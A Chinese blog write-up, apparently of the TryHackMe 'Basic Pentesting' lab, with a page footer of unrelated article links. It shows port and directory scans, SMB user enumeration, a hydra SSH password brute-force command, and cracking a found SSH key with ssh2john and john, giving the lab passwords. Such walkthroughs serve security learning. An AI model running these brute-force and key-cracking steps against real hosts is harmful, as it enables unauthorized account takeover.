来自tryhackme的 Basic Pentesting

开靶场IP:10.10.227.255

# nmap 端口扫描

PORT     STATE SERVICE     VERSION

22/tcp   open  ssh         OpenSSH 7.2p2 Ubuntu 4ubuntu2.4 (Ubuntu Linux; protocol 2.0)

80/tcp   open  http        Apache httpd 2.4.18 ((Ubuntu))

139/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

445/tcp  open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)

8009/tcp open  ajp13       Apache Jserv (Protocol v1.3)

8080/tcp open  http        Apache Tomcat 9.0.7

# gobuster 目录扫描

/.hta (Status: 403)

/.htaccess (Status: 403)

/.htpasswd (Status: 403)

/development (Status: 301)

/index.html (Status: 200)

/server-status (Status: 403)

在/development发现

#

2018-04-23: I've been messing with that struts stuff, and it's pretty cool! I think it might be neat

to host that on this server too. Haven't made any real web apps yet, but I have tried that example

you get to show off how it works (and it's the REST version of the example!). Oh, and right now I'm

using version 2.5.12, because other versions were giving me trouble. -K

2018-04-22: SMB has been configured. -K

2018-04-21: I got Apache set up. Will put in our content later. -J

#

For J:

I've been auditing the contents of /etc/shadow to make sure we don't have any weak credentials,

and I was able to crack your hash really easily. You know our password policy, so please follow

it? Change that password ASAP.

-K

根据提示工具 使用 SMB 查找用户名怎么样?

/root/Desktop/Tools/Miscellaneous/enum4linux.pl -a 10.10.227.255

S-1-22-1-1000 Unix User\kay (Local User)

S-1-22-1-1001 Unix User\jan (Local User)

得到用户名jan

使用hydra爆破ssh密码

hydra -t 4 -l jan -P /usr/share/wordlists/rockyou.txt 10.10.227.255 ssh

......等了很久大概有十分钟的样子

passwd:armando

按照提示使用LinEnum找到到登录的ssh

https://github.com/rebootuser/LinEnum(开箱即用)

/home/kay/.ssh/id_rsa

使用

ssh2john rsa_a.id_rsa >id_rsa_hash.txt

john --wordlist=/usr/share/wordlists/rockyou.txt id_rsa_hash.txt

破解密码为

beeswax(很快)

登录

ssh -i id_rsa kay@10.10.227.255

即可

Basic Pentesting的更多相关文章

  1. vulnhub writeup - 持续更新

    目录 wakanda: 1 0. Description 1. flag1.txt 2. flag2.txt 3. flag3.txt Finished Tips Basic Pentesting: ...

  2. Atitit HTTP 认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结

    Atitit HTTP认证机制基本验证 (Basic Authentication) 和摘要验证 (Digest Authentication)attilax总结 1.1. 最广泛使用的是基本验证 ( ...

  3. Basic Tutorials of Redis(9) -First Edition RedisHelper

    After learning the basic opreation of Redis,we should take some time to summarize the usage. And I w ...

  4. Basic Tutorials of Redis(8) -Transaction

    Data play an important part in our project,how can we ensure correctness of the data and prevent the ...

  5. Basic Tutorials of Redis(7) -Publish and Subscribe

    This post is mainly about the publishment and subscription in Redis.I think you may subscribe some o ...

  6. Basic Tutorials of Redis(6) - List

    Redis's List is different from C#'s List,but similar with C#'s LinkedList.Sometimes I confuse with t ...

  7. Basic Tutorials of Redis(5) - Sorted Set

    The last post is mainly about the unsorted set,in this post I will show you the sorted set playing a ...

  8. Basic Tutorials of Redis(4) -Set

    This post will introduce you to some usages of Set in Redis.The Set is a unordered set,it means that ...

  9. Basic Tutorials of Redis(3) -Hash

    When you first saw the name of Hash,what do you think?HashSet,HashTable or other data structs of C#? ...

  10. Basic Tutorials of Redis(2) - String

    This post is mainly about how to use the commands to handle the Strings of Redis.And I will show you ...

随机推荐

  1. 30张图说清楚 TCP 协议

    大家好,我是风筝 前两天分享了 20张图说清楚 IP 协议 今天,继续来网管的自我修养之TCP协议,这可是除 IP 协议外另一个核心协议了. TCP 协议是网络传输中至关重要的一个协议,它位于传输层. ...

  2. 为什么HashMap查找比List快很多?

    做两数之和这道题目时,引发了一个思考: 为什么两者运行时间相差如此之大???好残忍,我List比你HashMap到底差在哪**** 于是我一顿查资料.... 战犯哈希算法登场 哈希算法会根据你要存入的 ...

  3. git命令的学习和基本使用

    初始化 git init (your_project) 配置 --local 只对当前仓库有效 --global 对当前用户所有仓库有效 --system 对系统登录的所有用户有效 git confi ...

  4. 《爆肝整理》保姆级系列教程-玩转Charles抓包神器教程(13)-Charles如何进行Mock和接口测试

    1.简介 Charles最大的优势在于抓包分析,而且我们大部分使用的功能也在抓包的功能上,但是不要忘记了,Charles也可以做接口测试.至于Mock,其实在修改请求和响应数据哪里就已经介绍了,宏哥就 ...

  5. 每日复习关于static 饿汉式 懒汉式,单例设计模式

    1.1.static 的使用 当我们编写一个类时,其实就是在描述其对象的属性和行为,而并没有产生实质上的对象,只有通过 new 关键字才会产生出对象,这时系统才会分配内存空间给对象,其方法才可以供外部 ...

  6. R语言网络数据爬取

    现在大家对爬虫的兴趣不断高涨,R和PYTHON是两个非常有力的爬虫工具.Python倾向于做大型爬虫,与R相比,语法相对复杂,因此Python爬虫的学习曲线会相对陡峭.对于那些时间宝贵,又想从网上获取 ...

  7. [VMware]常见问题处理

    参考文献 [1] VMware 无法打开虚拟机 该虚拟机似乎正在使用 - 百度经验 [2] 233 http://10.0.8.46:8080/cas/autologin?username=admin ...

  8. [Linux]CentOS7(LiveGnome版)配置网络

    话接上一回合,刚通过U盘启动盘安装CentOS7(LiveGnome)完成后,访问不了网络.肿么办?且听咱慢慢道来. 咱平时都是使用(有线网络)网卡,通过公司分配的固定IP地址(包括:固定主机IP.固 ...

  9. 四月六号java基础学习

    四月六号 1.今天学习了JAVA语言特点,有以下几个特点: 1)简单易学:相对于C/c++语言,java语言省去了指针(pointer).联合体(Unions)以及结构体(struct) 2)面向对象 ...

  10. LeeCode 二叉树问题(一)

    二叉树的遍历 二叉树节点定义 public class TreeNode { int val; TreeNode left; TreeNode right; TreeNode() {} TreeNod ...